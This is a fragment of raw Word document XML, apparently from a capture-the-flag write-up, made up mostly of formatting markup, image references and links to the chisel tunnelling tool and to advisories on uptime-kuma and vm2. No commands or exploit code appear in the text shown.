          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1473200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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7">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successfully retrieve the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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headerReference r:id="rId46" w:type="default"/>
      <w:headerReference r:id="rId47" w:type="first"/>
      <w:headerReference r:id="rId48" w:type="even"/>
      <w:footerReference r:id="rId49" w:type="default"/>
      <w:footerReference r:id="rId50" w:type="first"/>
      <w:footerReference r:id="rId51"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B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="7"/>
    <w:bookmarkEnd w:id="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83" name="image26.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image26.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7C">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7D">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4.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4.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Integrator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40.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image40.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5.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId45"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header" Target="header3.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xm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4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/louislam/uptime-kuma/security/advisories/GHSA-hfxh-rjv7-2369" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/vuln/SNYK-JS-VM2-5537100" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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6.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0.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jsb3vCiP1lRJMHKzF10CzS4BrQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnZpMWd5MnN3bjJsazIOaC5lNW5qbmw0NDFxNDcyDmguZGRzNHNmMWtoNzZpMg5oLjE3NWY1Y3M5NHowbzgAciExVUpoR3gwMHl2MHRzenRJbmhUTEJSRXNISlpWQWtDZTk=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